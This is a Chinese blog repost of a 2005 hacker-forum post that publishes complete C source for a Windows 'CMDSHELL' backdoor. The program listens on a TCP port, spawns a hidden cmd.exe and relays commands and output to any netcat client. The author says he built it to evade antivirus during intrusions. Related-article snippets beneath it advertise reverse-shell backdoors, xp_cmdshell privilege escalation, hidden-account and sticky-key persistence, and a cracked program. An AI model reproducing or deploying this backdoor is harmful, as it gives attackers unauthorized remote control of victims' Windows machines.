一个简单的CMDSHELL后门

最新推荐文章于 2024-04-28 10:55:39 发布
最新推荐文章于 2024-04-28 10:55:39 发布
阅读量57 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/cdo/archive/2005/06/23/179787.html
版权
文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的)
信息来源: 邪恶八进制 中国

  最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。
  程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以使用nc。本来还想设计成服务让其开机后自动运行,由于时间问题等以后完善了。
  用法:smallhorse [-p port] -p参数用于设置自己的端口
 
  下面是源程序,贴出来和大家共同学习进步,同时希望高手不吝指教,小马在此谢了先。
QQ:11189658 E-MAIL:horse_man@163.com
 
在vc++6.0 WIN2003下编译通过

#include<winsock2.h>
#include <stdio.h>
#pragma comment (lib, "Ws2_32.lib")
int port=1983;
DWORD WINAPI ClientThread(LPVOID lpParam);
void Help()
{printf("     /***************************************\\\n");
printf("     |This SmallHorse's First CMDSHELL V0.1 |\n");
printf("     |Thanks For Using It!             |\n");
printf("     |SmallHorse [E.S.T] VIP 2005.03     |\n");
printf("     |***************************************|\n");
printf("     |usage:smallhorse [-p port]         |\n");
printf("     |     port: Port Number To Listen On   |\n");
printf("     |     Default Port Is 1983         |\n");
printf("     \\***************************************/\n");
return;
}


void OpenDoor()
{
    // 初始化 Winsock.
  WSADATA wsaData;
    SOCKET m_socket,AcceptClient;
    sockaddr_in Service,Client;
    int ClientSize,i=0;
  int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
  if ( iResult != NO_ERROR )
    return;

  // 创建一个 socket.
 
  m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
  if(m_socket==SOCKET_ERROR)
        return;
  Service.sin_family = AF_INET;
  Service.sin_addr.s_addr = htonl(INADDR_ANY);
  Service.sin_port = htons( port );

  if(bind( m_socket, (SOCKADDR*)&Service, sizeof(Service) )==SOCKET_ERROR)
      return;//邦定
 
  if (listen(m_socket,5)==SOCKET_ERROR)
        return;//最大监听列队5个
  printf("\nsmallhorse Listen On Port: %d... ^*^\n",port);
    ClientSize=sizeof(Client);
    while(1)
    {
    AcceptClient=accept(m_socket,(SOCKADDR*)&Client,&ClientSize);
    if(AcceptClient==SOCKET_ERROR)
        return;//接受连接
    printf( "Client Connected.\n");
    char *sendbuf = "/***************************************\\\n\tThanks For Using...\n\tSmallHorse's CmdShell!\n\tGood Luck!\n\\***************************************/\n\n";
  send( AcceptClient, sendbuf, strlen(sendbuf), 0 );
   
    if(CreateThread(NULL,0,ClientThread,(LPVOID)&AcceptClient,0,NULL)==NULL)
        printf("Create Thread Error!\n");
    Sleep(1000);
    }
    WSACleanup();
    return;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
{int ret;
char Buf[1024];
HANDLE Rpipe,Wpipe,Wfile,Rfile;
SOCKET AcceptClient=(SOCKET)*(SOCKET*)lpParam;

SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(sa);
sa.bInheritHandle=TRUE;
sa.lpSecurityDescriptor=NULL;

ret=CreatePipe(&Rpipe,&Rfile,&sa,0);
ret=CreatePipe(&Wfile,&Wpipe,&sa,0); //建立两个管道,分别用于接收命令和显示结果

STARTUPINFO startinfo;
GetStartupInfo(&startinfo);
startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput=Wfile;
startinfo.hStdError=startinfo.hStdOutput=Rfile;
startinfo.wShowWindow=SW_HIDE;

char cmdline[MAX_PATH];
GetSystemDirectory(cmdline,MAX_PATH);
    strcat(cmdline,("\\cmd.exe"));

PROCESS_INFORMATION proinfo;
ret=CreateProcess(cmdline,NULL,NULL,NULL,1,0,NULL,NULL,&startinfo,&proinfo);
unsigned long ByteRec;
while(1)
{
    Sleep(100);
    PeekNamedPipe(Rpipe,Buf,1024,&ByteRec,0,0);
    if(ByteRec){
        ret=ReadFile(Rpipe,Buf,ByteRec,&ByteRec,0);
        if(!ret)
              break;
        ret=send(AcceptClient,Buf,ByteRec,0);
        if(ret<=0)
              break;
    }
    else{
        ByteRec=recv(AcceptClient,Buf,1024,0);
        if(ByteRec<=0)
              break;
        ret=WriteFile(Wpipe,Buf,ByteRec,&ByteRec,0);
        if(!ret)
              break;
    }
}
return 0;
}
int main(int argc, char *argv[])
{  
  Help();
    if(argc==3)
        if(!strcmp(argv[1],"-p"))
              port=atoi(argv[2]);
    OpenDoor();
return 0;
}

转载于:https://www.cnblogs.com/cdo/archive/2005/06/23/179787.html

weixin_30547797
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c++ cmdshell反弹型后门
07-01
反弹型后门 把自身注入到IE中 反向链接服务端 用NC 来监听就可以 大家可以发挥想象 把其他代码补全 (Rebound-type back door to reverse itself into the link into IE to listen with the NC server can imagine we...
数据库提权,Mssql xp_cmdshell提权
luSaMa的博客
07-06 1624
针对Mssql xp_cmdshell提权的学习实践,SQL Server2008/2012及以前版本基本都能用,但是2016或更高版本部分不能用,或者SA权限太低,导致无法提权。数据库提权的方式也不止有Mssql xp_cmdshell一种,之后更多的提权方式也是我更应该学习的地方。
C/C++ 匿名管道反弹CMDShell
CSDN
06-11 5061
该段代码是一个用于Windows平台的反向Shell程序,它通过在被控制端和控制端之间建立网络连接,实现远程控制和命令执行。它在被控制端创建管道来重定向控制台命令输出,并将命令执行结果发送回控制端。控制端可以向被控制端发送命令,被控制端接收并执行这些命令,并将执行结果返回给控制端。一旦连接成功,程序可以接收本地输入的命令,并在远程主机上执行这些命令,并将命令的输出返回到本地主机。然后,程序通过管道将命令输出发送回本地,并持续监听新的命令输入。
操作系统权限维持(二)之Windows系统-克隆账号维持后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-25 1078
隐藏账户,顾名思义就是计算机上看不到的用户在一个用户名后面添加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持
xp_cmdshell的内容
swort_177的专栏
12-23 940
 xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展存贮过程。 一般情况下,xp_cmdshell对管理员来说也是不必要的,xp_cmdshell的消除不会对Server造成任何影响。 可以将xp_cmdshell消除删除方法为:到sql server的查询分析器中,试用存储过程sp_d
BetterBackdoor:具有多种功能的后门
02-05
通常,后门实用程序(例如NetCat)具有两个主要功能:将远程输入通过管道传输到cmd或bash并输出响应。 这很有用,但也有局限性。 BetterBackdoor通过提供注入按键,获取屏幕截图,传输文件和许多其他任务的能力,...
端口复用版winshell编写的后门程序源代码
09-18
Wxhshell 最近的练手作品,主要练习C的socket编程, 本后门以服务方式运行,采用端口复用技术, ...服务描述信息:Wrsky Windows CmdShell Service 注册表键名:Wxhshell 默认端口:5000 最大连接数:100
后门程序源码wxhshell
07-02
winshell一个非常不错的后门程序,但是现在已经 有些过时了,于是我写了一个新的wxhshell,在这款后门里我采用了端口复用技术,因此可 以突破一些防火墙。其运行不影响正常端口的工作。 注意:本后门对于...
兴达快递单打印软件 9.87 专业版-破解版 BY-smallhorse(内存注册机)
04-03
〖兴达快递单打印软件(专业版)〗的主要特点:   1.软件界面友好,可操作性强。   2.软件从企业或店铺的实际出发开发的。   3.快递单可以单张打印或批量打印。   4.可以选择要批量打印的快递单范围。   5.可以设置快递单上打印的字体。   6.收件信息可以导出到Excel表中。   7.支持Excel表导入功能。   8.随时可以数据库备份与恢复。   9.可以隐藏和显示寄件日期。   10.功能稳定,易学,易用。   11.一次注册终身使用。
常用端口号大全
12-28
在这里详细介绍了一下操作系统中常用端口的功能及分类。
windows创建隐藏用户及后门
diaobusi的博客
06-20 1838
在Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户:Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
简单cmd双管道后门
qq_42124567的博客
05-16 942
这几天学习了一下windows后门编程,并尝试着写了一个简单cmd双管道后门。主要涉及到了socket通信和管道。 后门分为主动连接型和反向连接型,区别就是一个后门程序作为服务端,另一个后门程序作为客户端。 双管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。 多的不说,直接上代码,我觉得注...
使用管道实现简单CMD后门程序,并转化为Shellcode
Birldlee的博客
12-26 2719
实现一个能实现远程控制功能的shellcode,控制被攻击的主机。
操作系统权限维持(一)之Windows系统-粘贴键后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-23 529
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。Web入侵流程。
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
最新发布
励志做最业余的专业博主,控件产品可以私我~
04-28 735
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
探秘MySQL主从复制的多种实现方式
todoitbo的博客
04-26 1051
本文将深入探讨MySQL主从复制的多种实现方式,包括基于语句、基于行和混合模式等。无论您是初学者还是有经验的数据库管理员,都能通过本文全面了解MySQL主从复制技术的多样化选择,从而提高数据库的可用性和性能。
ubuntu18源码安装postgresql15.2数据库
04-27 404
由于官方的源只能安装到pg10这个版本,整了好一会没有成功就改为源码安装了。
使用PHP写一个后门监控代码
02-21
我不熟悉PHP,但是我可以尝试给你一些建议:1....2.研究不同类型的后门代码;3.尝试编写一个简单后门代码;4.了解有关安全合规的相关知识;5.熟悉文件处理,以及相关的安全流程。希望我的建议能帮到你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值